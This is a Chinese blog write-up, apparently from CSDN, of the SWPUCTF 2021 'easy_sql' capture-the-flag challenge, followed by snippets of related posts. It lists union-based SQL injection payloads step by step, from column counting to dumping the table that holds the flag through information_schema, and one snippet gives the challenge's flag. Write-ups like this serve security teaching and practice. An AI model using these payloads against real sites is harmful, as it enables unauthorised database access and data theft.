SWPUCTF 2021 新生赛]easy_sql

原创 于 2024-02-19 11:02:44 发布 · 484 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库

文章详细描述了在分析源代码时如何通过测试不同的SQL查询(如`wllm=1`,`unionselect`等)来发现字符型漏洞,并利用这些漏洞获取数据库信息,最终揭示了`flag`字段作为密码的可能性。

1.f12打开源代码,发现要求我们传的参数是wllm

2.首先输入?wllm=1,出现以下界面,说明回显正常

输入?wllm=1' ,出现报错,说明为字符型漏洞

分别输入

  ?wllm=1’ order by 3--+

?wllm=1’ order by 4--+

发现不存在4列,存在3列

输入?wllm=-1' union select 1,2,3--+查看回显

输入?wllm=-1' union select 1,2,database()--+

输入?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

查看test_db的表

输入?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

查字段

输入 -1' union select 1,2,group_concat(id,flag) from test_tb--+ 

查看flag的字段,得到密码。

 

[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 1388
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
[SWPUCTF 2021 新生]easy_sql
zoixsoadji的博客
05-06 1628
感谢平台Nssctf 进入题目,说是让我们输入点东西,f12打开源代码,发现要求我们传的参数是wllm 那么我们就传入一个wllm=1,发现有注入点 先查看有几个库:?wllm=-1' order by 1--+ ?wllm=-1' order by 2--+ ?wllm=-1' order by 3--+ 接下来查回显:?wllm=union select 1,2,3--+ 看到回显位是2,3,查库名:?wllm=-1' union select 1,2,databas.
[SWPUCTF 2021 新生]web 解题思路,实操解析,解题软件,解题方法
09-06
SWPUCTF 2021新生的web项目中,参者遇到了一系列与SQL注入有关的挑战。SQL注入是一种常见的网络安全攻击方式,攻击者通过在Web表单输入或URL查询字符串中输入恶意的SQL代码,可以对数据库执行未授权的操作。...
SWPUCTF 2021 新生 easy_sql
最新发布
03-25
### 关于 SWPUCTF 2021 新生 easy_sql 的解题思路 SQL 注入是一种常见的安全漏洞,攻击者通过向应用程序输入恶意 SQL 查询来获取敏感数据或执行未经授权的操作。对于 SWPUCTF 2021 新生中的 `easy_sql` 题目,...
CTF刷题第一周
qq_62660611的博客
11-10 2036
第一周刷题记录
[SWPUCTF 2021 新生]easy_sql解题记录
2301_80050903的博客
01-25 732
wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段。wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+wllm=1' ,出现报错,说明为字符型漏洞。
[SWPUCTF 2021 新生]easy_sql的WriteUp
2301_76435948的博客
10-22 3446
可以看到有列名为id,flag,说明flag极大可能在这个表中。一道简单的sql注入题,首先查看源代码,看看参数是啥。可知,我们需要用到参数wllm。3可以,4不行,说明字段数为3。先试试test_tb表。用wllm参数试一下。
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值